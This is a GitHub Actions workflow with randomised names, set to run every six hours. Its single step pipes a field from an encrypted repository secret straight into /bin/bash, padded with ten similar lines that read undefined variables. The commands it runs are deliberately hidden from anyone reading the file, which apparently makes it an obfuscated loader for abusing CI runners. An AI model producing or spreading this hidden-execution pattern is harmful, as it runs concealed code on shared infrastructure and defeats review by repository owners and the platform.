name: haoriyangw

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haoriyangw
        env:
          owig36: ${{ secrets.owig36 }}
        run: |
          echo $owig36 | jq -r .xl4 | /bin/bash
          echo $rmck3 | jq -r .rr16896 | /bin/bash
          echo $rrvrh96577 | jq -r .xq3 | /bin/bash
          echo $hqshg56985 | jq -r .awmcv5117 | /bin/bash
          echo $w42 | jq -r .w071 | /bin/bash
          echo $fd30772 | jq -r .sfvle183 | /bin/bash
          echo $vt65 | jq -r .qi656 | /bin/bash
          echo $xwg38984 | jq -r .cyr329 | /bin/bash
          echo $e23 | jq -r .yb5371 | /bin/bash
          echo $l84 | jq -r .qyrfp4827 | /bin/bash
          echo $f03686 | jq -r .u20702 | /bin/bash

